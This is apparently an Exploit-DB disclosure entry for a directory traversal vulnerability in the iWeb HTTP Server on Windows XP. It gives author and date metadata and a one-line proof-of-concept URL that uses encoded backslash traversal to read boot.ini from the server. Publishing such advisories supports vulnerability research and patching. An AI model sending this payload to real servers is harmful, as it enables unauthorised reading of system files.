iWeb HTTP Server - Directory Traversal

Author: mr_me
type: webapps
platform: windows
port: 
date_added: 2009-12-05 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comiws2.exe

#################################################################
#
# iWeb HTTP server Directory Transversal Vulnerability
# Found By: mr_me
# Download: http://www.ashleybrown.co.uk/iweb/
# Tested On: Windows XPSP3
#
#################################################################

POC:

http://server/..%5C..%5C..%5Cboot.ini